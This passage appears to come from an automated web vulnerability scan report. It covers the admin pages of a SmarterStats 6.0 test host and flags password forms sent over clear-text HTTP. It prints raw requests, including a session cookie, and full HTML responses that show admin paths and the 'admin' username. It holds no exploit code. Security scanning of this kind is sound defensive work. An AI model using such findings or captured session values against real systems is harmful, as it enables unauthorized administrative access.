<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwODk4MzY1MDUPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWCGYPZBYCAgEPZBYCAgIPDxYCHwQFFnNvbWVvbmVAeW91cmRvbWFpbi5jb21kZAIBD2QWAgIBD2QWAgICDw8WAh8EBQkxMjcuMC4wLjFkZAIDD2QWAgIBD2QWAgICDw8WAh8EZWRkAgQPZBYCAgEPZBYEZg8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCAg8PFgIfBGVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUsY3RsMDAkTVBIJGNoa1NNVFBBdXRoZW50aWNhdGlvbl9TZXR0aW5nQ2hlY2tSGzOL99CxzdQfS16581et8/thZWIK141DJBgffZRGig==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave','','ctl00$BPH$btnTest',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Email Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>
   <div id="ctl00_BPH_btnTest" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnTest',''); return false;"><span class="BBInner">Test Connection</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel1">
   
           <table class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_txtFromAddress">
           <td id="ctl00_MPH_txtFromAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtFromAddress_Setting" class="Setting"><input name="ctl00$MPH$txtFromAddress_SettingText" type="text" value="someone@yourdomain.com" size="40" id="ctl00_MPH_txtFromAddress_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtSMTPServer">
           <td id="ctl00_MPH_txtSMTPServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSMTPServer_Setting" class="Setting"><input name="ctl00$MPH$txtSMTPServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSMTPServer_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_chkSMTPAuthentication">
           <td id="ctl00_MPH_chkSMTPAuthentication_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSMTPAuthentication_Setting" class="Setting"><input id="ctl00_MPH_chkSMTPAuthentication_SettingCheck" type="checkbox" name="ctl00$MPH$chkSMTPAuthentication_SettingCheck" /><label for="ctl00_MPH_chkSMTPAuthentication_SettingCheck">Enable SMTP authentication</label></td>
       </tr><tr id="ctl00_MPH_txtAuthUsername">
           <td id="ctl00_MPH_txtAuthUsername_Label" class="Indent Fixed">Auth Username</td><td id="ctl00_MPH_txtAuthUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAuthUsername_SettingText" type="text" id="ctl00_MPH_txtAuthUsername_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_txtAuthPassword">
           <td id="ctl00_MPH_txtAuthPassword_Label" class="Indent Fixed">Auth Password</td><td id="ctl00_MPH_txtAuthPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAuthPassword_SettingText" type="password" id="ctl00_MPH_txtAuthPassword_SettingText" class="text" autocomplete="off" /></td>
       </tr>
   </table>
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmemailreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmEmailReportSettings\x2easpx?'); });
$('#ctl00_MPH_txtAuthPassword_SettingText').val('');
$(function() { SetTopTitle('Email\x20Settings'); });
modules['vmNotBlank_txt']='Must have a value';
modules['vmEmail_txt']='Must be an email address';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtFromAddress_SettingText","VMs":["vmNotBlank","vmEmail"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSMTPServer_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Auth Username","vcID":"ctl00_MPH_txtAuthUsername_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"Auth Password","vcID":"ctl00_MPH_txtAuthPassword_SettingText","VMs":["vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkSMTPAuthentication_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


4.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmGeneralSettings.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /Admin/frmGeneralSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminSettings"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:31 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 20864



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   General Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmGeneralSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1',''], ['ctl00$BPH$btnSave',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       General Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Web Settings</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>System Administrator</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Administrative Emails</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem3" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel1">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_WebSettingsTab" />

<div id='ctl00_MPH_WebSettingsTab' class='' >
           <span id="ctl00_MPH_WebSettingsTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstRows">
                   <td id="ctl00_MPH_lstRows_Label" class="Indent Fixed">Rows per Page</td><td id="ctl00_MPH_lstRows_Setting" class="Setting"><select name="ctl00$MPH$lstRows_SettingDropDown" id="ctl00_MPH_lstRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="0">All</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSkins">
                   <td id="ctl00_MPH_lstSkins_Label" class="Indent Fixed">Default Skin</td><td id="ctl00_MPH_lstSkins_Setting" class="Setting"><select name="ctl00$MPH$lstSkins_SettingDropDown" id="ctl00_MPH_lstSkins_SettingDropDown">
                       <option value="Default">Default</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkEnable">
                   <td id="ctl00_MPH_chkEnable_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnable_Setting" class="Setting"><input id="ctl00_MPH_chkEnable_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnable_SettingCheck" /><label for="ctl00_MPH_chkEnable_SettingCheck">Enable users to override skin</label></td>
               </tr><tr id="ctl00_MPH_chkEnableAutoReminderPopups">
                   <td id="ctl00_MPH_chkEnableAutoReminderPopups_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkEnableAutoReminderPopups_Setting" class="Setting"><input id="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck" type="checkbox" name="ctl00$MPH$chkEnableAutoReminderPopups_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkEnableAutoReminderPopups_SettingCheck">Enable automatic reminder popups</label></td>
               </tr><tr id="ctl00_MPH_chkResetGettingStarted">
                   <td id="ctl00_MPH_chkResetGettingStarted_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResetGettingStarted_Setting" class="Setting"><input id="ctl00_MPH_chkResetGettingStarted_SettingCheck" type="checkbox" name="ctl00$MPH$chkResetGettingStarted_SettingCheck" /><label for="ctl00_MPH_chkResetGettingStarted_SettingCheck">Reset getting started</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministratorTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministratorTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lblSiteID">
                   <td id="ctl00_MPH_lblSiteID_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_lblSiteID_Setting" class="Setting"><span id="ctl00_MPH_lblSiteID_ReadOnlyLabel">admin</span></td>
               </tr><tr id="ctl00_MPH_txtAdminUsername">
                   <td id="ctl00_MPH_txtAdminUsername_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtAdminUsername_Setting" class="Setting"><input name="ctl00$MPH$txtAdminUsername_SettingText" type="text" value="admin" id="ctl00_MPH_txtAdminUsername_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtAdminOldPassword">
                   <td id="ctl00_MPH_txtAdminOldPassword_Label" class="Indent Fixed">Old Password</td><td id="ctl00_MPH_txtAdminOldPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminOldPassword_SettingText" type="password" id="ctl00_MPH_txtAdminOldPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminNewPassword">
                   <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">New Password </td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtAdminConfirmPassword">
                   <td id="ctl00_MPH_txtAdminConfirmPassword_Label" class="Indent Fixed">Confirm New Password </td><td id="ctl00_MPH_txtAdminConfirmPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminConfirmPassword_SettingText" type="password" id="ctl00_MPH_txtAdminConfirmPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_AdministrativeEmailsTab' class='' style='display:none'>
           <span id="ctl00_MPH_AdministrativeEmailsTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtProblemsEmailAddress">
                   <td id="ctl00_MPH_txtProblemsEmailAddress_Label" class="Indent Fixed">Email Address</td><td id="ctl00_MPH_txtProblemsEmailAddress_Setting" class="Setting"><input name="ctl00$MPH$txtProblemsEmailAddress_SettingText" type="text" value="administrator@example.com" size="40" id="ctl00_MPH_txtProblemsEmailAddress_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtSmtpServer">
                   <td id="ctl00_MPH_txtSmtpServer_Label" class="Indent Fixed">SMTP Server</td><td id="ctl00_MPH_txtSmtpServer_Setting" class="Setting"><input name="ctl00$MPH$txtSmtpServer_SettingText" type="text" value="vulnerable.smarterstats.6.0.host" size="40" id="ctl00_MPH_txtSmtpServer_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_chkProblemEmailsEnabled">
                   <td id="ctl00_MPH_chkProblemEmailsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkProblemEmailsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkProblemEmailsEnabled_SettingCheck" /><label for="ctl00_MPH_chkProblemEmailsEnabled_SettingCheck">Enable email notifications</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmgeneralsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.document.location.reload(true);
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmGeneralSettings\x2easpx?'); });
$('#ctl00_MPH_txtAdminOldPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
$('#ctl00_MPH_txtAdminConfirmPassword_SettingText').val('');
$(function() { SetTopTitle('General\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_WebSettingsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_AdministratorTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AdministrativeEmailsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtAdminUsername_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm New Password ","vcID":"ctl00_MPH_txtAdminConfirmPassword_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password ","vmMustMatchField":"ctl00_MPH_txtAdminNewPassword_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmEmail_txt']='Must be an email address';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtProblemsEmailAddress_SettingText","VMs":["vmOptional","vmEmail","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSmtpServer_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


4.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Admin/frmSite.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:16:56 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72921
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Sites - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmSite.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="
dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAACkBTRU9TdGF0dXMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAAxTRU9TdGF0dXNUYWILZAUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTUPMtwLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc